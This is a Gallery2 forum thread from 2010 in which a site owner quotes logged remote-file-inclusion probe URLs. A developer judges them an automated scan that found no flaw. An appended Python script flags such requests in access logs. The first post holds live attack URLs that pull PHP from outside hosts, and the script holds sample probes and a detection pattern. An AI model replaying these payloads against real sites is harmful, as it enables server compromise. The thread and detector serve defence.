Exploit? PHP File injection? Suspicious URLs to my gallery2.3.1 Update: Gallery2 secure!

Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Thu, 2010-01-28 22:13

I keep seeing people hit my installation with URLs like this.

http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html//errors.php&error=http://www.anabolex.com/gallery/uploads/16570/hosting/a??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://www.focusi.net/bbs/data/board_free/satu.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20////&_SERVER[DOCUMENT_ROOT]=http://julie.pwo.ca/idxx.txt???
(don't click, this isn't my actual site)

They show up in my Gallery2 log with the error "Error (ERROR_MISSING_OBJECT)"

I look at these sites it's appending on the URL and it's a text file with some PHP in it, seems like some kind of PHP injection attack. Is my site vulnerable? I was running 2.3 and the site was broken, though it worked the other day, so I updated to 2.3.1 and now I am back up but am just wondering if this is a known exploit or if it's old and fixed in 2.3.1.

edit: OH! I only discovered this because Google sent me an email saying my site was compromised, however the "malware" links they provided and claimed I was hosting did not exist on my server so I am kind of confused why I got that.

 
bharat

Joined: 2002-05-21
Posts: 7934
Posted: Fri, 2010-01-29 01:11

It looks to me like a fishing attempt to try to find a vulnerability. We're always interested in possible security vulnerabilities, though, so if you can email the details to

we'll be happy to investigate and see if we can figure out what's going on.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

 
Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Fri, 2010-01-29 02:09

OK will do. My site is getting hammered with those types of requests literally every minute or so, so something is going on.

 
bharat

Joined: 2002-05-21
Posts: 7934
Posted: Fri, 2010-01-29 17:44

Followup: We talked offline and looked at the traffic and believe that this is an automated attack that is not turning up a vulnerability in Gallery2.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git
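
Added example, not part of the thread and not Gallery code: a small access-log triage script that flags requests like the ones quoted in the first post, where a query parameter's value is a remote URL, and counts them per client. It assumes Apache/nginx combined log format; the sample lines, addresses and hosts are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Combined Log Format: ip ident user [time] "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def find_rfi_probes(lines):
    """One record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target = m.groups()
        query = target.partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                # Trailing "?" makes anything the script appends part of a query string
                hits.append({"ip": ip, "param": name, "remote": value.rstrip("?")})
    return hits

def by_source(hits):
    """Count probes per client address to show how automated the traffic is."""
    return Counter(h["ip"] for h in hits)

# Constructed sample lines (documentation addresses, .invalid hosts)
SAMPLE = [
    '198.51.100.7 - - [28/Jan/2010:22:01:13 +0000] "GET /gallery/main.php'
    '?g2_path=index_php.jpg.html%20%20/index.php'
    '&g=http://203.0.113.9/probe/id.txt?? HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Jan/2010:22:02:10 +0000] "GET /gallery/main.php'
    '?g2_path=/index.php//index.php'
    '&mosConfig_absolute_path=http://files.example.invalid/a.txt?? HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Jan/2010:22:03:02 +0000] "GET /gallery/main.php'
    '?g2_path=index_php.jpg.html%20%20////'
    '&_SERVER[DOCUMENT_ROOT]=http://files.example.invalid/b.txt??? HTTP/1.1" 200 5120',
    '192.0.2.10 - - [28/Jan/2010:22:03:40 +0000] "GET /gallery/main.php'
    '?g2_itemId=42 HTTP/1.1" 200 18230',
]

if __name__ == "__main__":
    probes = find_rfi_probes(SAMPLE)
    for hit in probes:
        print(hit)
    print(by_source(probes))
```

The parameter names it reports (`g`, `mosConfig_absolute_path`, `_SERVER[DOCUMENT_ROOT]`) are not ones Gallery2's `main.php` is being asked for by a normal visitor, which is consistent with a generic scanner replaying probes written for other applications.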